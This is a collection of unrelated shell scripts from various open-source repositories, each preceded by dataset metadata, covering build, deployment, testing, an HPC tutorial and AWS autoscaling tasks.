printf "${F_HEADR} ___ ___ ____ _ ____ _ \n / _ \ / _ \ _ | _ \ | | | _ \ (_) \n| | | | | | | (_) | |_) | __ _ ___| |__ | |_) | __ _ ___ _ ___ ___ \n| | | | | | | | _ < / _| / __| '_ \ | _ < / _| / __| |/ __/ __|\n| |_| | |_| | _ | |_) | (_| \__ \ | | | | |_) | (_| \__ \ | (__\__ \\ \n \___/ \___/ (_) |____/ \__,_|___/_| |_| |____/ \__,_|___/_|\___|___/\n${F_DEFAULT}\n"
press_2_cont "First of all lets find out where we are on the cluster.\n"
printf "${F_CODE}pwd${F_DEFAULT} stands for 'Print Working Directory'\n"
printf "Try typing ${F_CODE}pwd${F_DEFAULT} into the command line now.\n"
}
#ALIASES
pwd () {
/usr/bin/pwd
if [ "${STEP}" == "0" ]; then
press_2_cont "\nThis is your home directory, your home directory should be used for non-project related data.\n\n"
#sleep 3s
press_2_cont "Next we will learn how to copy files from different directories.\n"
#sleep 3s
printf "Try copying the rest of the tutorial to your home directory with:"
printf "\n\n\t${F_CODE}cp -r ${TUT_PATH} ~/${F_DEFAULT}\n\n\t${F_NOTE}'-r' : Allows copying of folders.\n\t'~/' : Refers to your home directory.\n${F_DEFAULT}"
STEP="1"
fi
return 0
}
cp () {
/usr/bin/cp ${@:2}
if [ -d "${HOME}/training" ] && [ "${STEP}" == "1" ]; then
#if [ "$1" == "-r" ] && [ "$2" == "${TUT_PATH}" ] && [ "$3" == "${HOME}/" ]; then
press_2_cont "\nWell done! You copied a folder."
printf "\nNow change your directory to the folder you just moved using:"
printf "\n\n\t${F_CODE}cd ~/training${F_DEFAULT}\n"
STEP="2"
fi
return 0
}
cd () {
/usr/bin/cd ${@:2}
if [ "${PWD}" == "${HOME}/training" ] && [ "${STEP}" == "2" ]; then
press_2_cont "\nTo see what is in the current directory type...."
printf "${F_GOOD}Congrats!${F_DEFAULT} Thats the end of this tutorial, to start the next one type:\n"
printf "\n\n\t${F_CODE}source ${TUT_PATH}/01-Loading_Software/source_me${F_DEFAULT}\n"
end_of_tut
fi
return 0
}
# sacct () {
# /opt/slurm/17.11.7/bin/sacct
# sleep 1s
# return 0
# }
#alias sacct="sacct"
####################
intro
| true |
4289db3372bca07d6df39b3c664517ef073c1d7b
|
Shell
|
adrianwebb/cm-bootstrap
|
/bootstrap.sh
|
UTF-8
| 2,967 | 4.0625 | 4 |
[] |
no_license
|
#!/bin/bash
#-------------------------------------------------------------------------------
#
# bootstrap.sh
#
#-------------------------------------------------------------------------------
# Help
if [ -z "$HELP" ]
then
export HELP="
This script bootstraps a machine with all of the components (packages and
configurations) it needs to run the CM system.
Systems initialized:
* Base system - Hostname configured
- Hosts file initialized (if applicable)
- DNS configured
- System package updates
- Build package installation
* Git - Git packages installed
- GitHub added to known hosts
* Ruby - Rubinius 2.5.x packages installed
- Execution alternative configuration (if applicable)
- Ruby Gem options initialized
* Nucleon - Nucleon gem and dependencies installed
* CM - CM gem and dependencies installed
--------------------------------------------------------------------------------
Tested under Ubuntu 14.04 LTS
Licensed under GPLv3
See the project page at: http://github.com/adrianwebb/cm-bootstrap
Report issues here: http://github.com/adrianwebb/cm-bootstrap/issues
"
fi
if [ -z "$USAGE" ]
then
export USAGE="
usage: bootstrap.sh script_name ... | Names of bootstrap scripts to run [ ##_(>>script_name<<).sh ]
--------------------------------------------------------------------------------
[ -h | --help ] | Show usage information
"
fi
#-------------------------------------------------------------------------------
# Parameters
STATUS=0
SCRIPT_DIR="$(cd "$(dirname "$([ `readlink "$0"` ] && echo "`readlink "$0"`" || echo "$0")")"; pwd -P)"
SHELL_LIB_DIR="$SCRIPT_DIR/lib/bash"
source "$SHELL_LIB_DIR/load.sh" || exit 100
#---
PARAMS=`normalize_params "$@"`
parse_flag '-h|--help' HELP_WANTED
# Standard help message.
if [ "$HELP_WANTED" ]
then
echo "$HELP"
echo "$USAGE"
exit 0
fi
if [ $STATUS -ne 0 ]
then
echo "$USAGE"
exit $STATUS
fi
#-------------------------------------------------------------------------------
# Utilities
BOOTSTRAP_SCRIPTS="$SCRIPT_DIR/os/$OS/tasks/*.sh"
#---
# Source library functions
for file in "$SCRIPT_DIR"/lib/*.sh
do source $file || exit 150
done
# Source configuration file
CONFIG_SCRIPT="$SCRIPT_DIR/os/$OS/config.sh"
source "$CONFIG_SCRIPT" || exit 200
#---
for SCRIPT in $BOOTSTRAP_SCRIPTS
do
SCRIPT_MATCH=''
if [[ "$SCRIPT" =~ _(.+)\.sh$ ]]
then
SCRIPT_NAME="${BASH_REMATCH[1]}"
if [ ! -z "$PARAMS" ]
then
for NAME in ${PARAMS[@]}
do
if [[ "$NAME" == "$SCRIPT_NAME" ]]
then
SCRIPT_MATCH='1'
fi
done
else
SCRIPT_MATCH='1'
fi
fi
if [ ! -z "$SCRIPT_MATCH" ]
then
echo "Processing: $SCRIPT"
source "$SCRIPT"
STATUS=$?
fi
if [ $STATUS -ne 0 ]
then
exit $STATUS
fi
done
exit $STATUS
| true |
e0da149936a26b619970d53184394cf427a5318f
|
Shell
|
nxt-lab/obnpy
|
/test/runtest.sh
|
UTF-8
| 349 | 2.640625 | 3 |
[] |
no_license
|
#!/bin/bash
# need to set obnchai and smnchai aliases before using them
shopt -s expand_aliases
source ~/.bash_profile
echo "Starting python OBN interface test"
echo "running chaiscript node..."
obnchai othernode.ons &
echo "run python node..."
python extnode.py &
echo "running simulation manager node..."
smnchai testpy.oss
echo "test finished"
| true |
b5b5232d22454108a92700daafc42cbfb90002c5
|
Shell
|
atn34/blog
|
/deploy.sh
|
UTF-8
| 602 | 3.3125 | 3 |
[] |
no_license
|
#! /bin/sh
REV=HEAD
SHA=$(git rev-list $REV | head -1)
DEPLOYDIR=/tmp/blog-deploy-$SHA
SOURCEDIR=/tmp/blog-source-$SHA
[email protected]:atn34/atn34.github.io.git
GITHUBSRC=atn34/blog
trap "rm -rf $DEPLOYDIR $SOURCEDIR" EXIT
mkdir $DEPLOYDIR
mkdir $SOURCEDIR
git clone $DEPLOYREMOTE $DEPLOYDIR
(cd $DEPLOYDIR && git ls-files | xargs rm -f)
git archive --format=tar $REV | (cd $SOURCEDIR && tar xf -)
./render.py build --dest $DEPLOYDIR --source $SOURCEDIR/content || exit
(cd $DEPLOYDIR && \
git add . && \
git commit -m "build of $GITHUBSRC@$SHA" && \
git push origin master)
| true |
6adaa8b40d2d47cada8b50232fc897f985d128af
|
Shell
|
misostack/nodejs-cs1-chatapp-api
|
/setup.sh
|
UTF-8
| 1,185 | 3.65625 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
echo ".................................."
echo "...............START..............."
echo ".................................."
from=.env.sample
declare -a List=(
"env"
)
for env in "${List[@]}"
do
to=".$env"
if test -f $to; then
echo "$to file exist. You need to add new config lines if needed manually."
else
echo -e "Copy $from to $to"
search="ENV_NAME"
replace="$env"
sed "s/$search/$replace/g" $from > $to
fi
done
firebaseServiceAccountKeyFile=firebaseServiceAccountKey.json
if test -f $firebaseServiceAccountKeyFile; then
echo "$firebaseServiceAccountKeyFile already existed!"
else
echo -e "Copy firebaseServiceAccountKey.sample.json to firebaseServiceAccountKey.json"
cp "firebaseServiceAccountKey.sample.json" "firebaseServiceAccountKey.json"
echo ".................................."
echo "You must replace firebaseServiceAccountKey.json with your service account key in firebase console."
fi
echo "..............WARNING............."
echo "To allow setup on heroku you must set these ENV params"
cat $from
echo ""
echo "..............DONE..............."
echo ".................................."
| true |
0220a7282d807688b840a05ade1b5ee0dba5d902
|
Shell
|
invisibleboy/mycompiler
|
/scripts/gen_profile_merge_lcode
|
UTF-8
| 6,579 | 2.703125 | 3 |
[
"NCSA"
] |
permissive
|
#!/bin/sh
perl -x $0 "$@"
exit $?
#!/usr/bin/perl
###############################################################################
##
## Illinois Open Source License
## University of Illinois/NCSA
## Open Source License
##
## Copyright (c) 2004, The University of Illinois at Urbana-Champaign.
## All rights reserved.
##
## Developed by:
##
## IMPACT Research Group
##
## University of Illinois at Urbana-Champaign
##
## http://www.crhc.uiuc.edu/IMPACT
## http://www.gelato.org
##
## Permission is hereby granted, free of charge, to any person
## obtaining a copy of this software and associated documentation
## files (the "Software"), to deal with the Software without
## restriction, including without limitation the rights to use, copy,
## modify, merge, publish, distribute, sublicense, and/or sell copies
## of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimers.
##
## Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimers in
## the documentation and/or other materials provided with the
## distribution.
##
## Neither the names of the IMPACT Research Group, the University of
## Illinois, nor the names of its contributors may be used to endorse
## or promote products derived from this Software without specific
## prior written permission. THE SOFTWARE IS PROVIDED "AS IS",
## WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
## LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
## PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES
## OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
## OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
## OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
##
###############################################################################
#
# Merges the Lcode profiles prior to annotation.
#
# Script written by Erik Nystrom, Matthew Merten, and Wen-mei Hwu 08/01
$file_count = 0;
# BUILD THE FILE HANDLE LIST
@fh_list = ();
foreach $param (@ARGV)
{
$file_handle = newopen($param);
die "Could not open $param\n" if (!file_handle);
push(@fh_list, $file_handle);
$file_count++;
print STDERR ">> opened $param\n";
}
$last_file = $file_count - 1;
$done = 0;
while(!$done) {
for ($j=0; $j < $file_count; $j++) {
$file_handle = $fh_list[$j];
if (!($_ = <$file_handle>))
{
die "Should end on j=0" if ($j != 0);
$done=1;
last;
}
if ($j == 0)
{
$weight = 0;
$weight2 = 0;
$cbnum = 0;
$types = 0;
}
if (/\(count\s+(\d+)/)
{
$weight = $weight + $1;
printf "(count %d)\n",$weight if ($j == $last_file);
}
elsif (/\(begin\s+(\w+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
printf "(begin $1 %f)\n",$weight if ($j == $last_file);
}
elsif (/\(end\s+(\w+)/)
{
print "(end $1)\n" if ($j == $last_file);
}
elsif (/\(cb\s+(\d+)\s+(\d+.\d+)/)
{
if ($j == 0)
{
$cbnum = $1;
}
else
{
die "lcb cb mismatch\n" if ($cbnum != $1);
}
$weight = $weight + $2;
printf " (cb %d %f)\n",$cbnum,$weight if ($j == $last_file);
}
elsif (/\(b\s+(\d+)\s+(\d+.\d+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
$weight2 = $weight2 + $3;
printf " (b $1 %f %f)\n",$weight,$weight2 if ($j == $last_file);
}
elsif (/\(pj\s+(\d+)\s+(\d+.\d+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
$weight2 = $weight2 + $3;
printf " (pj $1 %f %f)\n",$weight,$weight2 if ($j == $last_file);
}
elsif (/\(j\s+(\d+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
printf " (j $1 %f)\n",$weight if ($j == $last_file);
}
elsif (/\(lcb\s+(\d+)\s+(\d+.\d+)\s+(\d+)\s+(\d+)/)
{
$types = $3;
if ($j == 0)
{
#Clear hash before first use
undef %type_hash;
$cbnum = $1;
$weight = $2;
$hmmm = $4;
}
else
{
die "lcb cb mismatch\n" if ($cbnum != $1);
$weight += $2;
}
#Add keys to hash
for ($i=0; $i < $types; $i++)
{
$_ = <$file_handle>;
if (/\s*(\d+)\s+(\d+.\d+)/)
{
$type_hash{$1} += $2;
#print "$1 = $type_hash{$1}\n";
}
else
{
die "[$_] unexpected lcd params\n";
}
}
#Dump on last file
if ($j == $last_file)
{
$types = keys %type_hash;
print " (lcb $cbnum $weight $types $hmmm\n";
@tmplist = keys %type_hash;
@tmplist = sort numerically @tmplist;
foreach $key (@tmplist)
{
printf " ( $key %f)\n",$type_hash{$key};
}
print (" )\n");
}
$_ = <$file_handle>;
}
elsif (/\(jrg\s+(\d+)\s+(\d+.\d+)/)
{
if ($j == 0)
{
#Clear hash before first use
undef %type_hash;
$cbnum = $1;
$weight = $2;
}
else
{
die "jr mismatch\n" if ($cbnum != $1);
$weight += $2;
}
#Add keys to hash
$jrg_done = 0;
while (!($jrg_done))
{
$_ = <$file_handle>;
if (/\s*(\d+)\s+(\d+.\d+)/)
{
$type_hash{$1} += $2;
#print "$1 = $type_hash{$1}\n";
}
elsif(/^\s*\)/)
{
$jrg_done = 1;
}
else
{
die "[$_] unexpected jrg params\n";
}
}
#Dump on last file
if ($j == $last_file)
{
$types = keys %type_hash;
print " (jrg $cbnum $weight\n";
@tmplist = keys %type_hash;
@tmplist = sort numerically @tmplist;
foreach $key (@tmplist)
{
printf " ( $key %f)\n",$type_hash{$key};
}
print (" )\n");
}
}
else
{
die "Unknown token: $_";
}
}
}
sub numerically { $a <=> $b; }
sub newopen {
my $path=shift;
local *FH;
open(FH, $path) || return undef;
return *FH;
}
| true |
4153f38123eab43f4a281a8eab82dc3174a10e4e
|
Shell
|
moai/moai-community
|
/scripts/build-linux.sh
|
UTF-8
| 1,299 | 3.78125 | 4 |
[] |
no_license
|
#!/bin/bash
#
# Build script for GNU/Linux
# Usage: Run from Moai SDK's root directory:
#
# build-linux.sh
#
# You can change the CMake options using -DOPTION=VALUE
# Check moai-dev/cmake/CMakeLists.txt for all the available options.
#
set -e
if [ -z $1 ]; then
libprefix=`dirname $0`/../lib/linux
else
libprefix=$1
fi
mkdir -p $libprefix
libprefix=$(cd $libprefix; pwd)
cores=$(getconf _NPROCESSORS_ONLN)
: ${MOAI_SDK_HOME?"MOAI_SDK_HOME is not defined. Please set to the location of your MOAI SDK install (path)"}
pushd `dirname $0`/..
PITO_ROOT=$(pwd)
BUILD_DIR="build/build-linux"
if ! [ -d ${BUILD_DIR} ]; then
mkdir -p $BUILD_DIR
fi
cd $BUILD_DIR
# - This fix, "curl: sed not found in PATH. Cannot continue without sed."
# - Shells problems: fish,
if ! [ -e PATH_SEPARATOR ]; then
export PATH_SEPARATOR=:
fi
cmake \
-DBUILD_LINUX=TRUE \
-DMOAI_SDL=TRUE \
-DMOAI_SDK_HOME=${MOAI_SDK_HOME} \
-DMOAI_HTTP_SERVER=TRUE \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=$libprefix \
$PITO_ROOT/cmake/hosts/host-linux-sdl
cmake --build . --target install -- -j$cores
if [ ! -e "${PITO_ROOT}/bin/moai" ]; then
cp $libprefix/bin/moai $PITO_ROOT/bin/moai
fi
if [ ! -e "${MOAI_SDK_HOME}/util/moai" ]; then
cp $libprefix/bin/moai ${MOAI_SDK_HOME}/util/moai
fi
popd
exit 0
| true |
69b237eadae6ad6395ac6d9e5a2f2588d5ba14a9
|
Shell
|
Chingliu/WTL-DUI
|
/base/allocator/prep_libc.sh
|
UTF-8
| 1,378 | 3.5625 | 4 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# This script takes libcmt.lib for VS2005 and removes the allocation related
# functions from it.
#
# Usage: prep_libcmt.bat <VCInstallDir> <OutputFile>
#
# VCInstallDir is the path where VC is installed, typically:
# C:\Program Files\Microsoft Visual Studio 8\VC\
#
# OutputFile is the directory where the modified libcmt file should be stored.
#
LIBCMT="${1}\\libcmt.lib"
LIBCMTPDB="${1}\\libcmt.pdb"
OUTDIR=$2
OUTCMT="${2}\\libcmt.lib"
mkdir -p $OUTDIR
cp "$LIBCMT" "$OUTDIR"
cp "$LIBCMTPDB" "$OUTDIR"
# We'll remove the symbols based on paths found in either the VS2005 or VS2008
# libcmt.lib files.
LIBCMTSRCPATHVS2005="build\\intel\\mt_obj\\"
LIBCMTSRCPATHVS2008="f:\\dd\\vctools\\crt_bld\\SELF_X86\\crt\\src\\build\\INTEL\\mt_obj\\"
OBJFILES="malloc.obj free.obj realloc.obj new.obj delete.obj new2.obj delete2.obj align.obj msize.obj heapinit.obj expand.obj heapchk.obj heapwalk.obj heapmin.obj sbheap.obj calloc.obj recalloc.obj calloc_impl.obj new_mode.obj newopnt.obj"
for FILE in $OBJFILES
do
echo ${FILE}
LIB /NOLOGO /IGNORE:4006,4014,4221 /REMOVE:${LIBCMTSRCPATHVS2005}${FILE} $OUTCMT
LIB /NOLOGO /IGNORE:4006,4014,4221 /REMOVE:${LIBCMTSRCPATHVS2008}${FILE} $OUTCMT
done
| true |
3403551a2d0a09af86f3a5c5944d9287046f59e5
|
Shell
|
cbm-fles/flesnet
|
/contrib/bw_test
|
UTF-8
| 2,372 | 3.375 | 3 |
[] |
no_license
|
#!/bin/bash
#set -e
set -m
#debug
#set -x
ROOT_DIR="$(git rev-parse --show-toplevel)"
BINDIR=$ROOT_DIR/build
OUTFILE=result.log
FLIB_ADDR=01:00.0
PGEN_RATE=1
# size in steps of 1024ns
PGEN_MC_SIZE=100
FLIB_MC_LIMIT=1048576
BASE_EQID=0xF00
BUF_SIZE_EXP=28
LINK=(disable disable disable disable disable disable disable disable)
meassure () {
# configure FLIB
$BINDIR/flib_cfg -c /dev/null -l 2 -L flib_cfg.log -i ${FLIB_ADDR} \
-t $PGEN_MC_SIZE -r $PGEN_RATE \
--mc-size-limit $FLIB_MC_LIMIT \
--l0_source ${LINK[0]} --l0_eq_id ${BASE_EQID}0 \
--l1_source ${LINK[1]} --l1_eq_id ${BASE_EQID}1 \
--l2_source ${LINK[2]} --l2_eq_id ${BASE_EQID}2 \
--l3_source ${LINK[3]} --l3_eq_id ${BASE_EQID}3 \
--l4_source ${LINK[4]} --l4_eq_id ${BASE_EQID}4 \
--l5_source ${LINK[5]} --l5_eq_id ${BASE_EQID}5 \
--l6_source ${LINK[6]} --l6_eq_id ${BASE_EQID}6 \
--l7_source ${LINK[7]} --l7_eq_id ${BASE_EQID}7
# start FLIB Server
$BINDIR/flib_server -c /dev/null -L flib_server.log -i ${FLIB_ADDR} \
--data-buffer-size-exp $BUF_SIZE_EXP &
SERVER_PID=$!
# block till server is ready (remove if etcd is ready)
sleep 1
tail -f flib_server.log | while read LOGLINE
do
[[ "${LOGLINE}" == *"flib server started and running"* ]] && pkill -P $$ tail
done
echo "*** starting consumer ***"
$BINDIR/simple_consumer 0 2>&1 | tee -a $OUTFILE &
CONSUMER_PID=$!
echo "*** enabling readout ***"
$BINDIR/en_readout 0 > flib_info.log &
EN_0_PID=$!
wait $CONSUMER_PID
#kill -s SIGINT $EN_0_PID 2>/dev/null
#kill -s SIGINT $SERVER_PID 2>/dev/null
kill -s SIGINT $EN_0_PID
kill -s SIGINT $SERVER_PID
wait
}
rm $OUTFILE
echo -n "[" > $OUTFILE
MEAS=0
for NUM_LINKS in 1 2; do
echo "Messuring $NUM_LINKS links"
i=0
LINK=(disable disable disable disable disable disable disable disable)
while [ $i -lt $NUM_LINKS ]; do
LINK[$i]=pgen_near
let i=i+1
done
for PGEN_MC_SIZE in 10 80; do
echo "Messuring size $PGEN_MC_SIZE"
if [ $MEAS -ne 0 ]; then echo -n ", " >> $OUTFILE; fi
echo -n "{\"mc_size\": $PGEN_MC_SIZE, \"num_links\": $NUM_LINKS, \"Results\": " | tee -a $OUTFILE
meassure
echo -n "}" >> $OUTFILE
let MEAS=MEAS+1
done
done
echo "]" >> $OUTFILE
wait
exit 0
| true |
e9bc7439faa803ef635f12190f6201bd9a0fa22a
|
Shell
|
tommasop/dotfiles
|
/.config/yadm/bootstrap
|
UTF-8
| 260 | 2.8125 | 3 |
[] |
no_license
|
#!/bin/bash
# Update Ubuntu and get standard repository programs
./scripts/aptinstall.sh
# Run all programs/ install scripts
for f in scripts/programs/*.sh; do bash "$f" -H; done
# Get all upgrades
sudo apt upgrade -y
# See our zsh changes
source ~/.zshrc
| true |
550ed5507d91b03ce12d43b958ab83528544b6b1
|
Shell
|
chopark/CodeDeploy_NiFi
|
/autoscale_script/stop_autoscale.sh
|
UTF-8
| 605 | 3.984375 | 4 |
[] |
no_license
|
#!/bin/sh
## USAGE
## ./stop_autoscale.sh (target group)
#### e.g. (target group): 60s, 10m, 1h
SHELL=$0
if [ $# != 1 ]; then
echo "$SHELL: USAGE: $SHELL (target group)"
echo "$SHELL: e.g. (target group): 1, 2, 3, ..."
exit 1
fi
#Variables
target_group=$1
instance_limit=0
group_num=0
# Start each group that has 50 instances
while [ $group_num -lt $target_group ]; do
aws autoscaling set-desired-capacity --auto-scaling-group-name Edges_Group$group_num --desired-capacity $instance_limit --honor-cooldown
echo "$0: Stopped group$group_num"
group_num=$(($group_num+1))
done
| true |
c9451fb14fadb134fc18a2ef9961d661051cc6fc
|
Shell
|
JoshHilliker/Telemetry-Infra
|
/uc_scripts/dmesg_edac.sh
|
UTF-8
| 274 | 2.59375 | 3 |
[] |
no_license
|
#! /bin/bash
# purpose to do daily pull of DMESG in order to grab EDAC data (Error Detection and Correction driver) to utilize with a machine learning model for memory failure prediction.
while /bin/true ; do
dmesg | grep EDAC >> $(hostname)_test.txt
sleep 8640
done
| true |
e2c8b07a337d1f79c594ca5288ffbeffe92e0214
|
Shell
|
WabashOS/pfa-exp
|
/fed-overlay/root/util/pfa_exec
|
UTF-8
| 543 | 2.6875 | 3 |
[] |
no_license
|
#!/bin/sh
# This command executes the command in the PFA without interacting with cgroups.
# This command is not intended to be called directly (it's called by pfa_launch)
echo $$ > /sys/kernel/mm/pfa_stat
# Experiments run on core 1. This works best if the kernel cmdline includes
# isolcpus=1
# XXX This is causing a bus-error on Fedora when run as a command or run script. I need to try and enable cpuset in systemd and the kernel.
# taskset -p 0x2 $$
if [ -f /sys/kernel/mm/pfa_tsk ]; then
echo $$ > /sys/kernel/mm/pfa_tsk
fi
exec $@
| true |
0b58d3ffb0bcf23a00f36aab11dbe63503bf9185
|
Shell
|
gruntwork-io/terraform-aws-couchbase
|
/examples/local-mocks/aws.sh
|
UTF-8
| 5,990 | 3.671875 | 4 |
[
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This is a mock version of a script with the same name that replaces all the real methods, which rely on external
# dependencies, such EC2 Metadata and AWS API calls, with mock versions that can run entirely locally. This allows us
# to test all the scripts completely locally using Docker.
set -e
source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/string.sh"
source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/assert.sh"
source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/array.sh"
function aws_get_instance_private_ip {
hostname -i
}
function aws_get_instance_public_ip {
hostname -i
}
function aws_get_instance_private_hostname {
hostname -i
}
function aws_get_instance_public_hostname {
hostname -i
}
function aws_get_instance_region {
# This variable is set in docker-compose.yml
echo "$mock_aws_region"
}
function aws_get_ec2_instance_availability_zone {
# This variable is set in docker-compose.yml
echo "$mock_availability_zone"
}
# Return the container ID of the current Docker container. Per https://stackoverflow.com/a/25729598/2308858
function aws_get_instance_id {
cat /proc/1/cgroup | grep 'docker/' | tail -1 | sed 's/^.*\///'
}
# This mock returns a hard-coded, simplified version of the aws ec2 describe-tags call.
function aws_get_instance_tags {
local readonly instance_id="$1"
local readonly instance_region="$2"
# The cluster_asg_name below is an env var from docker-compose.yml
cat << EOF
{
"Tags": [
{
"ResourceType": "instance",
"ResourceId": "$instance_id",
"Value": "$cluster_asg_name",
"Key": "Name"
},
{
"ResourceType": "instance",
"ResourceId": "$instance_id",
"Value": "$cluster_asg_name",
"Key": "aws:autoscaling:groupName"
}
]
}
EOF
}
# This mock returns a hard-coded, simplified version of the aws autoscaling describe-auto-scaling-groups call.
function aws_describe_asg {
local readonly asg_name="$1"
local readonly aws_region="$2"
local size
size=$(get_cluster_size "$asg_name" "$aws_region")
assert_not_empty_or_null "$size" "size of ASG $asg_name in $aws_region"
cat << EOF
{
"AutoScalingGroups": [
{
"AutoScalingGroupARN": "arn:aws:autoscaling:$aws_region:123456789012:autoScalingGroup:930d940e-891e-4781-a11a-7b0acd480f03:autoScalingGroupName/$asg_name",
"DesiredCapacity": $size,
"AutoScalingGroupName": "$asg_name",
"LaunchConfigurationName": "$asg_name",
"CreatedTime": "2013-08-19T20:53:25.584Z"
}
]
}
EOF
}
# Get the size of the cluster. This comes from env vars set in docker-compose.yml. Note that if we are requesting the
# size of a cluster that isn't in the same region as this Docker container, then we must instead be requesting the size
# of the replica cluster, so we return that.
function get_cluster_size {
local readonly asg_name="$1"
local readonly aws_region="$2"
# All the variables are env vars set in docker-compose.yml
if [[ "$aws_region" == "$mock_aws_region" ]]; then
echo -n "$cluster_size"
else
echo -n "$replica_cluster_size"
fi
}
# Get the base name of the containers in the cluster. This comes from env vars set in docker-compose.yml. Note that if
# we are requesting the containers in a different region than the one this container is in, then we must instead be
# requesting looking for containers in the replica cluster, so we return that.
function get_container_basename {
local readonly asg_name="$1"
local readonly aws_region="$2"
# All the variables are env vars set in docker-compose.yml
if [[ "$aws_region" == "$mock_aws_region" ]]; then
echo -n "$data_node_container_base_name"
else
echo -n "$replica_data_node_container_base_name"
fi
}
# This mock returns a hard-coded, simplified version of the aws ec2 describe-instances call.
function aws_describe_instances_in_asg {
local readonly asg_name="$1"
local readonly aws_region="$2"
local size
size=$(get_cluster_size "$asg_name" "$aws_region")
assert_not_empty_or_null "$size" "size of ASG $asg_name in $aws_region"
local container_base_name
container_base_name=$(get_container_basename "$asg_name" "$aws_region")
assert_not_empty_or_null "$container_base_name" "container base name for ASG $asg_name in $aws_region"
# cluster_size and data_node_container_base_name are env vars set in docker-compose.yml
local instances_json=()
for (( i=0; i<"$size"; i++ )); do
instances_json+=("$(mock_instance_json "$asg_name" "$container_base_name-$i" "2018-03-17T17:38:3$i.000Z" "i-0ace993b1700c004$i")")
done
local readonly instances=$(array_join "," "${instances_json[@]}")
cat << EOF
{
"Reservations": [
{
"Instances": [
$instances
]
}
]
}
EOF
}
# Return the JSON for the "Instances" field of a aws ec2 describe-instances call
function mock_instance_json {
local readonly asg_name="$1"
local readonly container_name="$2"
local readonly launch_time="$3"
local readonly instance_id="$4"
# These hostnames are set by Docker Compose networking using the names of the services
# (https://docs.docker.com/compose/networking/). We use getent (https://unix.stackexchange.com/a/20793/215969) to get
# the IP addresses for these hostnames, as that's what the servers themselves will advertise (see the mock
# get_instance_xxx_hostname methods above).
local couchbase_hostname
couchbase_hostname=$(getent hosts "$container_name" | awk '{ print $1 }')
assert_not_empty_or_null "$couchbase_hostname" "hostname for container $container_name"
cat << EOF
{
"LaunchTime": "$launch_time",
"InstanceId": "$instance_id",
"PublicIpAddress": "$couchbase_hostname",
"PrivateIpAddress": "$couchbase_hostname",
"PrivateDnsName": "$couchbase_hostname",
"PublicDnsName": "$couchbase_hostname",
"Tags": [
{
"Value": "$asg_name",
"Key": "Name"
},
{
"Value": "$asg_name",
"Key": "aws:autoscaling:groupName"
}
]
}
EOF
}
| true |
4f6ef16a504b8ea4be886b6a5b4bc72d56948072
|
Shell
|
changqian9/cloudcdn-signed-cookie-nginx
|
/run.sh
|
UTF-8
| 1,184 | 2.984375 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if [ x$NOUSESECRET = xy ]
then
echo
else
BASE=$(dirname $(readlink -f $0))
source <(python3 $BASE/fetcher.py ${SECRETNAME}|base64 -d)
fi
set -ex
echo SIGNKEY="??"
set +x
test -n "$SIGNKEY"
set -x
echo KEYNAME="$KEYNAME"
test -n "$KEYNAME"
echo DOMAIN="$DOMAIN"
test -n "$DOMAIN"
export EXPIRES="${EXPIRES:-1200}"
export LOCATION_REGEXP="${LOCATION_REGEXP:-.*}"
echo BACKEND_SERVER="$BACKEND_SERVER"
test -n "$BACKEND_SERVER"
envsubst '$BACKEND_SERVER $LOCATION_REGEXP'\
< /etc/nginx/conf.d/default.conf.tmpl\
> /etc/nginx/conf.d/default.conf
exec /usr/local/bin/docker-entrypoint.sh
| true |
51a9cb348a655afce591c4ece7fee773fb684fc3
|
Shell
|
lspano-wellnet/pacobehatrunner
|
/paco_start.sh
|
UTF-8
| 1,879 | 3.0625 | 3 |
[] |
no_license
|
if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ]; then
echo 'ERROR: one or more MANDATORY variables are undefined'
echo 'expected input like [country] [brand] [environment]'
echo "input Examples:"
echo ' '
echo '+----------------------------------------------+'
echo "| it dt uat => Intrend Italy UAT |"
echo "| gb mm test => MaxMara United Kingdom TEST |"
echo '+----------------------------------------------+'
exit 1
fi
googleSheet=$(echo ${4}| cut -d'/' -f 6)
echo ${googleSheet}
if [ -z "$4" ]; then
googleSheet="1tFtpxNy2TzKI2W53iQPBFEmSBOKDB_7yzPZw3LXvFlc"
echo 'OPTIONAL parameter for google sheet not specified'
echo 'using default Paco Orders Google Sheet'
echo 'https://docs.google.com/spreadsheets/d/1tFtpxNy2TzKI2W53iQPBFEmSBOKDB_7yzPZw3LXvFlc'
fi
brand=$(php Start.php -b "${1};${2};${3};${googleSheet}")
echo running on ${brand}
cd ..
## use this command to run on AWS
## output:
